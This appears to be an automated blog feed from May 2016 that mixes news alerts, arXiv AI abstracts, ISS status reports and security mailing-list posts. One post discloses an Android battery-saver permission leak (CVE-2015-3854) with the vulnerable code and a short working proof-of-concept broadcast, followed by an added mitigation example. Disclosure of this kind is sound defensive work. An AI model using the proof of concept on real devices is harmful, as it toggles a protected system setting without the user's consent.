
Saturday, May 28, 2016

English

Profile page for the free company Anonymous Pillar Men.

from Google Alert - anonymous http://ift.tt/25q0K27
via IFTTT

Queen B-day gets anonymous 'donation'

A street party to celebrate the 90th birthday of British Queen Elizabeth II has received a 100,000-pound donation from an anonymous person branded ...

from Google Alert - anonymous http://ift.tt/1siTnLy
via IFTTT

Anonymous

Anonymous. 887 829 likes · 761 051 people are talking about this. Official Anonymous (group). We do not forgive. We do not forget. Expect ...

from Google Alert - anonymous http://ift.tt/1P7phVA
via IFTTT

I have a new follower on Twitter


Samimi Yazar
Twitter Maniac | yozgat | istanbul


Following: 19564 - Followers: 112838

May 28, 2016 at 06:12AM via Twitter http://twitter.com/samimiyazariz

The Great Carina Nebula


A jewel of the southern sky, the Great Carina Nebula, also known as NGC 3372, spans over 300 light-years, one of our galaxy's largest star forming regions. Like the smaller, more northerly Great Orion Nebula, the Carina Nebula is easily visible to the unaided eye, though at a distance of 7,500 light-years it is some 5 times farther away. This gorgeous telescopic close-up reveals remarkable details of the region's central glowing filaments of interstellar gas and obscuring cosmic dust clouds. The field of view is over 50 light-years across. The Carina Nebula is home to young, extremely massive stars, including the stars of open cluster Trumpler 14 (below and right of center) and the still enigmatic variable Eta Carinae, a star with well over 100 times the mass of the Sun. Eta Carinae is the brightest star, seen here just above the dusty Keyhole Nebula (NGC 3324). While Eta Carinae itself maybe on the verge of a supernova explosion, X-ray images indicate that the Great Carina Nebula has been a veritable supernova factory. via NASA http://ift.tt/1ORra3a

Member Resources

By submitting this form, you are granting: The Augustine Fellowship, S.L.A.A., 1550 NE Loop 410, San Antonio, Texas, 78209, United States, ...

from Google Alert - anonymous http://ift.tt/1qQBFh8
via IFTTT

Friday, May 27, 2016

Unseen Anonymous Photo Sharing

Camera, feeds, anonymous sharing and conversations. GetUnseen.com.

from Google Alert - anonymous http://ift.tt/1P4Nf3N
via IFTTT

An Armenian Wishlist for Anonymous

BY GAREN YEGPARIAN. As you probably know, “Anonymous” is an ultra-secretive, underground, very loosely “organized” group of hackers whose ...

from Google Alert - anonymous http://ift.tt/1TK6mPD
via IFTTT

Facebook Ads now Tracks you, Even if you don't have an Account

There's nowhere to hide across the web, especially from the marketing and advertising companies. If you are paranoid about your privacy, you may get upset to know that Facebook will now track and deliver targeted Ads on other apps and websites for everyone, even if you do not have Facebook accounts. Until now, Facebook was showing targeted ads only to its users, but now the social networking


from The Hacker News http://ift.tt/1NSAdpM
via IFTTT

Ravens: Rookie Keenan Reynolds can defer his military service to play in NFL, Sec. of Defense Ashton Carter announces (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

How to get Anonymous Ravkav

I'm planning to stay in Israel for around a month and was thinking of getting an "anonymous" ravkav since I am not an Israeli citizen. 1. How do I apply?

from Google Alert - anonymous http://ift.tt/1OSd69F
via IFTTT

Google Wins Epic Java Copyright Case Against Oracle

Google has finally won six-year long $9-billion legal battle with Oracle over the use of Java APIs in Android. Oracle filed its lawsuit against Google in 2010, claiming that the company illegally used 11,500 lines of Java code in its Android operating system, violating copyrights owned by Oracle. However, a federal jury of ten people concluded Thursday that Google's use of Java constituted "


from The Hacker News http://ift.tt/1qP3Hts
via IFTTT

Ravens: DT Timmy Jernigan changes his number to No. 99 to honor Warren Sapp; Hall of Famer tweets "how do I stop this?" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Berat
❤️GÖZTEPE ❤️https://t.co/t15UT6yetL snapchat : beratkamisligol
İZMİR

Following: 2490 - Followers: 16776

May 27, 2016 at 09:51AM via Twitter http://twitter.com/Beraattk

ISS Daily Summary Report – 05/26/16

Bigelow Expandable Aerospace Module (BEAM) Inflation: The crew began inflation operations this morning. During the course of two hours, the crew slowly pressurized BEAM using ISS cabin air, but BEAM only moved ~5 inches compared to the expected 72 inches in displacement and increased from 12 inches compared to the expected ~34 inches of increase in diameter. Once the pressure rose above the maximum planned levels, teams agreed to stand down on operations to discuss the forward plan and analyze the situation. There will be no inflation attempts tomorrow. BEAM pressures will be checked overnight and tomorrow morning. The ISS and BEAM are in safe configuration.

Auxin Transport Run #2: Following a three day incubation of samples in the Cell Biology Experiment Unit (CBEF), the crew completed fixation of those samples, which closes out the Auxin Transport experiment run. The Japan Aerospace Exploration Agency (JAXA) Auxin Transport investigation clarifies the role of auxins in pea and maize (corn) seedlings grown in microgravity, leading to new insight into how gravity, or the lack of gravity, affects plant development. This study is expected to contribute to increasing efficiency of plant cultivation in plant factories. The data obtained from the second experiment run will provide evidence of spaceflight‐alterations in auxin polar transport and endogenous levels of auxin, resulting in automorphogenesis.

Human Research Facility (HRF) Resupply: The crew removed expired limited life items and resupplied with fresh items with coordination from the ground. Photos of the new items and their location were downlinked for review and verification by ground teams.

Treadmill 2 (T2) Inspection: The crew completed this monthly maintenance to inspect the bungee shackle key mount witness marks, Y-Axis isolators, 2 bottom snubbers and all 4 snubber arms for signs of free play. No issues were reported.

Compound Specific Analyzer-Combustion Products (CSA-CP) Maintenance: The crew completed this regularly scheduled maintenance to zero calibrate and replace battery packs in all CSA-CPs. Following these activities the units were deactivated.

Today’s Planned Activities
All activities were completed unless otherwise noted.

MORZE. Evaluation using SPRUT-2 MAGVEC Disconnection of MagVector Umbilicals from COL1F2 UIP Folding ARED Platform BEAM Extended Leak Check MAGVEC Hardware Connection SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) r/g 2224 HRF2 Supply Kit Resupply Surface samples from FGB equipment and structures / r/g 2354 MORZE. Psycho-physiological Evaluation: Tsentrovka Node3 Camera Setup BEAM Preparation for Manual Inflation BEAM. Deployment Controller Run 1 BAR. Experiment Ops / r/g 2361 BEAM NSI (NASA Standard Initiator, aka pyro) Circuit Check MORZE. Psycho-physiological Evaluation: Cattell’s Test BEAM. Deployment Controller,  Activation and charge monitoring MAGVEC MagVector umbilicals re-mating to COL1F2 UIP BEAM. Deployment Controller Run 2 BEAM Manual Inflation [Aborted] MORZE. Psycho-physiological Evaluation: Strelau Test Scheduled Maintenance of Compound Specific Analyzer- Combustion Products (CSA-CP) Cygnus Cargo Operations Verification of ИП-1 Flow Sensor Position BEAM Preparation for auto pressurization [Deferred] BEAM. Deployment Controller Run 3 [Deferred] MORZE. Psycho-physiological Evaluation: SUPOS Test BEAM. Deployment Controller, deactivation and stowage [Deferred] SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup r/g 2224 BEAM Pressure and Temperature Reading [Deferred] Download of log-files from БСПН P/L Server and БЗУ memory storage device / r/g 2364 BEAM Vestibule reconfiguration after completion of BEAM deployment [Deferred] MORZE. Closeout Ops СОЖ Maintenance AUT Hardware Gather ARED Footplate Unfold to Nominal Position RWS Power Down MELFI Ice Brick Insertion Crew OBT, Crew Medical Officer (CMO), Computer based training XF305 Camcorder Settings Adjustment AUT R2 Hardware Removal AUT R2 Sample fixation ALGOMETRIA. Experiment Ops / r/g 1808 BRI service data download from RSS1 laptop / r/g 2052 Cleaning fan screens on FGB interior panels (116, 316, 231, 431) Cygnus Cargo Operations GREAT START. Video Script Review r/g 2353 GREAT START. Preparation for the Experiment / r/g 2353 OTKLIK. Equipment Check / r/g 1588 GREAT START. EPO session and video recording of Regeneratsiya experiment / r/g 2353 Cygnus Cargo Operations Conference MELFI 2 Ice Brick Insertion AUT Sample Insertion into MELFI AUT R2 Hardware Removal AUT R2 Sample fixation GREAT START. Closeout Ops / r/g 2353 Monthly Inspection of T2 Treadmill System INTERACTION-2. Experiment Ops / r/g 2350 SAMS-CU CREW Space Acceleration Measurement System Control Unit Activation Health Maintenance System (HMS) Fundoscope Setup IMS Delta File Prep INTERACTION-2. Experiment Ops / r/g 2351 AUT Sample Insertion into MELFI AUT R2 Closeout Ops Fundoscope Eye Exam Inspection and photos of space behind SM panels / r/g 2334 Health Maintenance System (HMS) Fundoscope Setup Hematocrit  Hardware Setup r/g 2362 Fundoscope Eye Exam Health Maintenance System (HMS) – Fundoscope Teardown and Stowage

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
BEAM activities Nominal ground commanding

Three-Day Look Ahead:
Friday, 05/27: Vascular Echo ultrasound, Ocular Health, Cygnus cargo transfer
Saturday, 05/28: Crew off duty, housekeeping
Sunday, 05/29: Crew off duty

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Idle
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1Rwm0th
via IFTTT

Anonymous US Collector Buys 'Holy Grail of Publishing'

Anonymous U.S. Collector Buys 'Holy Grail of Publishing'. Duration: 01:13 18 hrs ago. Christie's Auction House in ...

from Google Alert - anonymous http://ift.tt/1P2EJlU
via IFTTT

Using an anonymous method to assign a delegate to an action (task 2 of 3).

using System; namespace Treehouse.CodeChallenges { public class Program { public Func<int, int> Square = delegate (int number) { return number ...

from Google Alert - anonymous http://ift.tt/25lICq1
via IFTTT

Adult-Themed Candy with Anonymous Shipping (1, 5, or 10 Bags)

Promotional value expires 90 days after purchase. Amount paid never expires. Promotional value expires 3 months from purchase date. Amount paid ...

from Google Alert - anonymous http://ift.tt/27UQaT1
via IFTTT

I have a new follower on Twitter


Ahmet Sevim
Avcılar | Beylikdüzü
İstanbul
https://t.co/ReZUtVqraY
Following: 22830 - Followers: 1766370

May 27, 2016 at 01:21AM via Twitter http://twitter.com/AhmetSevimm

IC 5067 in the Pelican Nebula


The prominent ridge of emission featured in this sharp, colorful skyscape is cataloged as IC 5067. Part of a larger emission nebula with a distinctive shape, popularly called The Pelican Nebula, the ridge spans about 10 light-years following the curve of the cosmic pelican's head and neck. This false-color view also translates the pervasive glow of narrow emission lines from atoms in the nebula to a color palette made popular in Hubble Space Telescope images of star forming regions. Fantastic, dark shapes inhabiting the 1/2 degree wide field are clouds of cool gas and dust sculpted by the winds and radiation from hot, massive stars. Close-ups of some of the sculpted clouds show clear signs of newly forming stars. The Pelican Nebula, itself cataloged as IC 5070, is about 2,000 light-years away. To find it, look northeast of bright star Deneb in the high flying constellation Cygnus. via NASA http://ift.tt/1qLt7rO

Thursday, May 26, 2016

Philippines Bank hit by SWIFT Hacking Group linked to North Korea

SWIFT Bank Hackers have attacked another bank in the Philippines using the same modus operandi as that in the $81 Million Bangladesh Bank heist. Security researchers at Symantec have found evidence that malware used by the hacking group shares code similarities with the malware families used in targeted attacks against South Korean and US government, finance, and media organizations in 2009.


from The Hacker News http://ift.tt/24aw4j0
via IFTTT

A PAC RL Algorithm for Episodic POMDPs. (arXiv:1605.08062v1 [cs.LG])

Many interesting real world domains involve reinforcement learning (RL) in partially observable environments. Efficient learning in such domains is important, but existing sample complexity bounds for partially observable RL are at least exponential in the episode length. We give, to our knowledge, the first partially observable RL algorithm with a polynomial bound on the number of episodes on which the algorithm may not achieve near-optimal performance. Our algorithm is suitable for an important class of episodic POMDPs. Our approach builds on recent advances in method of moments for latent variable model estimation.



from cs.AI updates on arXiv.org http://ift.tt/1Rv5WIo
via IFTTT

Deep Predictive Coding Networks for Video Prediction and Unsupervised Learning. (arXiv:1605.08104v1 [cs.LG])

While great strides have been made in using deep learning algorithms to solve supervised learning tasks, the problem of unsupervised learning - leveraging unlabeled examples to learn about the structure of a domain - remains a difficult unsolved challenge. Here, we explore prediction of future frames in a video sequence as an unsupervised learning rule for learning about the structure of the visual world. We describe a predictive neural network ("PredNet") architecture that is inspired by the concept of "predictive coding" from the neuroscience literature. These networks learn to predict future frames in a video sequence, with each layer in the network making local predictions and only forwarding deviations from those predictions to subsequent network layers. We show that these networks are able to robustly learn to predict the movement of synthetic (rendered) objects, and that in doing so, the networks learn internal representations that are useful for decoding latent object parameters (e.g. pose) that support object recognition with fewer training views. We also show that these networks can scale to complex natural image streams (car-mounted camera videos), capturing key aspects of both egocentric movement and the movement of objects in the visual scene, and generalizing across video datasets. These results suggest that prediction represents a powerful framework for unsupervised learning, allowing for implicit learning of object and scene structure.



from cs.AI updates on arXiv.org http://ift.tt/1sdSBj0
via IFTTT

Cognitive Dynamic Systems: A Technical Review of Cognitive Radar. (arXiv:1605.08150v1 [cs.AI])

We start with the history of cognitive radar, where origins of the PAC, Fuster research on cognition and principles of cognition are provided. Fuster describes five cognitive functions: perception, memory, attention, language, and intelligence. We describe the Perception-Action Cycle as it applies to cognitive radar, and then discuss long-term memory, memory storage, memory retrieval and working memory. A comparison between memory in human cognition and cognitive radar is given as well. Attention is another function described by Fuster, and we have given the comparison of attention in human cognition and cognitive radar. We talk about the four functional blocks from the PAC: Bayesian filter, feedback information, dynamic programming and state-space model for the radar environment. Then, to show that the PAC improves the tracking accuracy of Cognitive Radar over Traditional Active Radar, we have provided simulation results. In the simulation, three nonlinear filters: Cubature Kalman Filter, Unscented Kalman Filter and Extended Kalman Filter are compared. Based on the results, radars implemented with CKF perform better than the radars implemented with UKF or radars implemented with EKF. Further, radar with EKF has the worst accuracy and has the biggest computation load because of derivation and evaluation of Jacobian matrices. We suggest using the concept of risk management to better control parameters and improve performance in cognitive radar. We believe, spectrum sensing can be seen as a potential interest to be used in cognitive radar and we propose a new approach Probabilistic ICA which will presumably reduce noise based on estimation error in cognitive radar. Parallel computing is a concept based on divide and conquer mechanism, and we suggest using the parallel computing approach in cognitive radar by doing complicated calculations or tasks to reduce processing time.



from cs.AI updates on arXiv.org http://ift.tt/1Z4wWnU
via IFTTT

The Symbolic Interior Point Method. (arXiv:1605.08187v1 [cs.AI])

A recent trend in probabilistic inference emphasizes the codification of models in a formal syntax, with suitable high-level features such as individuals, relations, and connectives, enabling descriptive clarity, succinctness and circumventing the need for the modeler to engineer a custom solver. Unfortunately, bringing these linguistic and pragmatic benefits to numerical optimization has proven surprisingly challenging. In this paper, we turn to these challenges: we introduce a rich modeling language, for which an interior-point method computes approximate solutions in a generic way. While logical features easily complicate the underlying model, often yielding intricate dependencies, we exploit and cache local structure using algebraic decision diagrams (ADDs). Indeed, standard matrix-vector algebra is efficiently realizable in ADDs, but we argue and show that well-known optimization methods are not ideal for ADDs. Our engine, therefore, invokes a sophisticated matrix-free approach. We demonstrate the flexibility of the resulting symbolic-numeric optimizer on decision making and compressed sensing tasks with millions of non-zero entries.



from cs.AI updates on arXiv.org http://ift.tt/1sdSN1F
via IFTTT

Probabilistic Inference Modulo Theories. (arXiv:1605.08367v1 [cs.AI])

We present SGDPLL(T), an algorithm that solves (among many other problems) probabilistic inference modulo theories, that is, inference problems over probabilistic models defined via a logic theory provided as a parameter (currently, propositional, equalities on discrete sorts, and inequalities, more specifically difference arithmetic, on bounded integers). While many solutions to probabilistic inference over logic representations have been proposed, SGDPLL(T) is simultaneously (1) lifted, (2) exact and (3) modulo theories, that is, parameterized by a background logic theory. This offers a foundation for extending it to rich logic languages such as data structures and relational data. By lifted, we mean algorithms with constant complexity in the domain size (the number of values that variables can take). We also detail a solver for summations with difference arithmetic and show experimental results from a scenario in which SGDPLL(T) is much faster than a state-of-the-art probabilistic solver.



from cs.AI updates on arXiv.org http://ift.tt/1Z4wKFp
via IFTTT

Kronecker Determinantal Point Processes. (arXiv:1605.08374v1 [cs.LG])

Determinantal Point Processes (DPPs) are probabilistic models over all subsets of a ground set of $N$ items. They have recently gained prominence in several applications that rely on "diverse" subsets. However, their applicability to large problems is still limited due to the $\mathcal O(N^3)$ complexity of core tasks such as sampling and learning. We enable efficient sampling and learning for DPPs by introducing KronDPP, a DPP model whose kernel matrix decomposes as a tensor product of multiple smaller kernel matrices. This decomposition immediately enables fast exact sampling. But contrary to what one may expect, leveraging the Kronecker product structure for speeding up DPP learning turns out to be more difficult. We overcome this challenge, and derive batch and stochastic optimization algorithms for efficiently learning the parameters of a KronDPP.



from cs.AI updates on arXiv.org http://ift.tt/1Rv6n5t
via IFTTT

Estimation of Passenger Route Choice Pattern Using Smart Card Data for Complex Metro Systems. (arXiv:1605.08390v1 [cs.AI])

Nowadays, metro systems play an important role in meeting the urban transportation demand in large cities. The understanding of passenger route choice is critical for public transit management. The wide deployment of Automated Fare Collection (AFC) systems opens up a new opportunity. However, only each trip's tap-in and tap-out timestamp and stations can be directly obtained from AFC system records; the train and route chosen by a passenger are unknown, which are necessary to solve our problem. While existing methods work well in some specific situations, they don't work for complicated situations. In this paper, we propose a solution that needs no additional equipment or human involvement than the AFC systems. We develop a probabilistic model that can estimate from empirical analysis how the passenger flows are dispatched to different routes and trains. We validate our approach using a large scale data set collected from the Shenzhen metro system. The measured results provide us with useful inputs when building the passenger path choice model.



from cs.AI updates on arXiv.org http://ift.tt/1sdSBzr
via IFTTT

CITlab ARGUS for historical handwritten documents. (arXiv:1605.08412v1 [cs.CV])

We describe CITlab's recognition system for the HTRtS competition attached to the 13. International Conference on Document Analysis and Recognition, ICDAR 2015. The task comprises the recognition of historical handwritten documents. The core algorithms of our system are based on multi-dimensional recurrent neural networks (MDRNN) and connectionist temporal classification (CTC). The software modules behind that as well as the basic utility technologies are essentially powered by PLANET's ARGUS framework for intelligent text recognition and image processing.



from cs.AI updates on arXiv.org http://ift.tt/1Z4wW7o
via IFTTT

Doubly Robust Off-policy Value Evaluation for Reinforcement Learning. (arXiv:1511.03722v3 [cs.LG] UPDATED)

We study the problem of off-policy value evaluation in reinforcement learning (RL), where one aims to estimate the value of a new policy based on data collected by a different policy. This problem is often a critical step when applying RL in real-world problems. Despite its importance, existing general methods either have uncontrolled bias or suffer high variance. In this work, we extend the doubly robust estimator for bandits to sequential decision-making problems, which gets the best of both worlds: it is guaranteed to be unbiased and can have a much lower variance than the popular importance sampling estimators. We demonstrate the estimator's accuracy in several benchmark problems, and illustrate its use as a subroutine in safe policy improvement. We also provide theoretical results on the hardness of the problem, and show that our estimator can match the lower bound in certain scenarios.



from cs.AI updates on arXiv.org http://ift.tt/1QlaMN5
via IFTTT

Auxiliary Deep Generative Models. (arXiv:1602.05473v2 [stat.ML] UPDATED)

Deep generative models parameterized by neural networks have recently achieved state-of-the-art performance in unsupervised and semi-supervised learning. We extend deep generative models with auxiliary variables which improves the variational approximation. The auxiliary variables leave the generative model unchanged but make the variational distribution more expressive. Inspired by the structure of the auxiliary variable we also propose a model with two stochastic layers and skip connections. Our findings suggest that more expressive and properly specified deep generative models converge faster with better results. We show state-of-the-art performance within semi-supervised learning on MNIST, SVHN and NORB datasets.



from cs.AI updates on arXiv.org http://ift.tt/1Oh5oUN
via IFTTT

Hierarchical Compound Poisson Factorization. (arXiv:1604.03853v2 [cs.LG] UPDATED)

Non-negative matrix factorization models based on a hierarchical Gamma-Poisson structure capture user and item behavior effectively in extremely sparse data sets, making them the ideal choice for collaborative filtering applications. Hierarchical Poisson factorization (HPF) in particular has proved successful for scalable recommendation systems with extreme sparsity. HPF, however, suffers from a tight coupling of sparsity model (absence of a rating) and response model (the value of the rating), which limits the expressiveness of the latter. Here, we introduce hierarchical compound Poisson factorization (HCPF) that has the favorable Gamma-Poisson structure and scalability of HPF to high-dimensional extremely sparse matrices. More importantly, HCPF decouples the sparsity model from the response model, allowing us to choose the most suitable distribution for the response. HCPF can capture binary, non-negative discrete, non-negative continuous, and zero-inflated continuous responses. We compare HCPF with HPF on nine discrete and three continuous data sets and conclude that HCPF captures the relationship between sparsity and response better than HPF.



from cs.AI updates on arXiv.org http://ift.tt/23w57Lt
via IFTTT

Ravens: Ray Rice spoke to Baltimore rookies Thursday; believed to be first time he was at facility since being released (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Blan PD receives anonymous $50K donation

BLANCHESTER — The Blanchester Police Department received a $50,000 donation Thursday from a resident wishing to remain anonymous. “It is the ...

from Google Alert - anonymous http://ift.tt/1WnPBxb
via IFTTT

Anonymous $15k Donation to City of Holland

HOLLAND (WHTC) -- Holland Youth Connections could receive up to $15000 from an anonymous donor if the donation is matched through community ...

from Google Alert - anonymous http://ift.tt/1RuPMP1
via IFTTT

Anonymous

The young woman whose face is pixelated is 28 years old and lives in a high-risk area. She has been working as an employee at a private business ...

from Google Alert - anonymous http://ift.tt/1sdjvaK
via IFTTT

NFL: Ravens forfeit 1 week of June OTAs, plus team and John Harbaugh fined for violating offseason rules at rookie camp (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Raspberry Pi 3 to get official Android OS support

It's fair to say the success of the ARM-powered Raspberry Pi computers have surpassed expectations and have been a godsend to hobbyists, hackers, and students. If you're one of those people looking for unofficial hacks to install Android OS on a Raspberry Pi device, then stop and wait for the official release. Raspberry Pi computers have largely been Linux affairs, as several Linux


from The Hacker News http://ift.tt/1OPHLEy
via IFTTT

I have a new follower on Twitter


erpscan
ERPScan. Detect and Prevent Cyberattacks in SAP and Oracle business-critical ERP systems
Palo Alto, CA
http://t.co/eF2IkBDTom
Following: 1953 - Followers: 1767

May 26, 2016 at 11:25AM via Twitter http://twitter.com/erpscan

Anonymous Tip Leads to Drug Arrest

A Chillicothe woman is facing felony charges after an anonymous tip led to the discovery of items used in the manufacture of methamphetamine.

from Google Alert - anonymous http://ift.tt/25jZxJI
via IFTTT

Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability

Hi Ulisses, The XSS found is a different one. The one mentioned on http://ift.tt/1TFA3Bc has a screenshot where the XSS is inserted when creating a new role and by preventing the javascript filters to execute. A new role can only be created by the admin user. This XSS is also performed by inserting the

Re: [FD] CVE-2015-3854 Battery permission leakage in Android

The Credit of this vulnerability is to Qidan He (@flanker_hqd) from KeenLab(http://ift.tt/1scxEoI), Tencent.

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-3854 Battery permission leakage in Android

Hi:

I'm posting some vulnerabilities I reported to Android and fixed last year prior to the Android Security Bounty program launch. Since there're no public bulletins for these ancient reports, I'm writing to the maillist for the record.

Details
=======

A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER.

There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java. An attacker app without any permission can turn off battery save mode (which should be guarded by DEVICE_POWER permission, which is a system permission, lead to permission leakage), dismiss low battery notification.

##Analysis

The PowerNotificationWarnings registered a dynamic receiver without permission guard, listening for the following actions:

- PNW.batterySettings
- PNW.startSaver
- PNW.stopSaver
- PNW.dismissedWarning

The PNW.stopSaver will call setSaverMode(false), thus call mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false).

(code of PowerNotificationWarnings.java)

```java
private final class Receiver extends BroadcastReceiver {

    public void init() {
        IntentFilter filter = new IntentFilter();
        filter.addAction(ACTION_SHOW_BATTERY_SETTINGS);
        filter.addAction(ACTION_START_SAVER);
        filter.addAction(ACTION_STOP_SAVER);
        filter.addAction(ACTION_DISMISSED_WARNING);
        // The fourth argument (broadcastPermission) is null: no sender permission is required.
        mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        final String action = intent.getAction();
        Slog.i(TAG, "Received " + action);
        if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) {
            dismissLowBatteryNotification();
            mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT);
        } else if (action.equals(ACTION_START_SAVER)) {
            dismissLowBatteryNotification();
            showStartSaverConfirmation();
        } else if (action.equals(ACTION_STOP_SAVER)) {
            dismissSaverNotification();
            dismissLowBatteryNotification();
            setSaverMode(false); // PERMISSION LEAK HERE!
        } else if (action.equals(ACTION_DISMISSED_WARNING)) {
            dismissLowBatteryWarning();
        }
    }
}
```

An ordinary app cannot directly call this method because this API call is guarded by system permission DEVICE_POWER, however by sending a broadcast with action "PNW.stopSaver", it can trigger this API call on behalf of SystemUI, thus stops battery saver without user action and awareness.

Tested on Nexus 6/Nexus 7 (5.1.1)

##POC code(do not require any permission)

```java
Intent intent = new Intent();
intent.setAction("PNW.stopSaver");
sendBroadcast(intent);
```

##Possible mitigations

Use a local broadcast mechanism, or use permission to guide the dynamic receiver.

##Official fixes:

fixed in http://ift.tt/1qLvZ8j

##Report timeline

2015.5.6 Initial report to security@android.com
2015.5.8 Android Security Team acks and assigned ANDROID-20918350
2015.6.1 The bug is fixed in Android internal branch
2015.7.24 CVE Requested, assigned CVE-2015-3854
2016.5.26 Public Disclosure

Source: Gmail -> IFTTT-> Blogger
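The "use permission to guard the dynamic receiver" mitigation from the PowerNotificationWarnings report above, written for an ordinary app as an added example; it is not AOSP code and not part of the original report. The class, the action name and the permission name are hypothetical, and the example goes slightly beyond the report by also handling the export flag that current Android versions require.

```java
// Added example. The manifest is assumed to declare and request the
// hypothetical signature-level permission used below:
//   <permission android:name="com.example.power.permission.CONTROL_SAVER"
//               android:protectionLevel="signature" />
//   <uses-permission android:name="com.example.power.permission.CONTROL_SAVER" />
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Handler;

public final class SaverControlReceiver extends BroadcastReceiver {

    // Hypothetical names, chosen for this example only.
    static final String ACTION_STOP_SAVER = "com.example.power.action.STOP_SAVER";
    static final String PERMISSION_CONTROL_SAVER =
            "com.example.power.permission.CONTROL_SAVER";

    private final Runnable onStopSaver; // the privileged operation to protect

    public SaverControlReceiver(Runnable onStopSaver) {
        this.onStopSaver = onStopSaver;
    }

    /** Registers the receiver so that only senders holding the permission reach onReceive(). */
    public void register(Context context, Handler handler) {
        IntentFilter filter = new IntentFilter(ACTION_STOP_SAVER);
        // A null third argument (broadcastPermission), as in the reported code,
        // would let any installed app deliver this action.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU) {
            // API 33+: the export decision must be explicit for app-defined actions.
            context.registerReceiver(this, filter, PERMISSION_CONTROL_SAVER, handler,
                    Context.RECEIVER_EXPORTED);
        } else {
            context.registerReceiver(this, filter, PERMISSION_CONTROL_SAVER, handler);
        }
    }

    /** Sender side: target our own package so the request is not offered to other apps. */
    public static void requestStopSaver(Context context) {
        Intent intent = new Intent(ACTION_STOP_SAVER)
                .setPackage(context.getPackageName());
        context.sendBroadcast(intent);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Constant-first equals() keeps the check safe if the action is null.
        if (!ACTION_STOP_SAVER.equals(intent.getAction())) {
            return;
        }
        onStopSaver.run();
    }
}
```

When every legitimate sender lives in the same app, `Context.RECEIVER_NOT_EXPORTED` (API 33+) is the stricter choice and corresponds to the report's local-broadcast mitigation.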

Check anonymous users only if session has started

Hello, We have a situation where anonymous user ip is required only when he started an active session. I have added a simple check on the hook init.

from Google Alert - anonymous http://ift.tt/1TGj1mt
via IFTTT

ISS Daily Summary Report – 05/25/16

Microgravity Science Glovebox (MSG) High Definition (HD) Video Drawer Checkout: Following yesterday’s installation of the new HD video drawer and two HD video monitors, the crew continued the upgrade process for the MSG video equipment by completing checkout activities. After the hardware was set up and powered, the video signals were routed using the HD Video Drawer Graphical User Interface (GUI) located as a remote desktop application on the MSG Laptop Computer. The MSG HD video hardware was stowed following completion of the checkout activities.

Fine Motor Skills: A series of interactive tasks were completed for the Fine Motor Skills investigation. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth’s gravity.

Dose Tracker: The crew completed entries for medication tracking. This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) are occurring during missions.

Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of an area or activity providing insight related to human factors and habitability. The investigation collects information about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required and whether a mission’s duration impacts how much space crew members need.

Bigelow Expandable Aerospace Module (BEAM) Vestibule Outfitting: The crew completed Node 3 (N3) Aft vestibule pressurization and leak check, opened the hatch, and completed installation and hardware deployment in N3 Aft BEAM Vestibule for all of the equipment required to support tomorrow’s planned BEAM deployment. Completed tasks were: Common Berthing Mechanism (CBM) Control Panel Assembly (CPA) and Center Disc Cover (CDC) removal, ground strap installation, deployment of BEAM deployment controller with associated cables except for power cable, deployment of multimeter with BEAM Resistive Thermal Device (RTD) jumper, installation of BEAM Vestibule data cable. BEAM ingress is scheduled for June 2.

OA-6 Cargo Transfer Operations: Today the crew completed OA-6 unpack.

Today’s Planned Activities

All activities were completed unless otherwise noted.

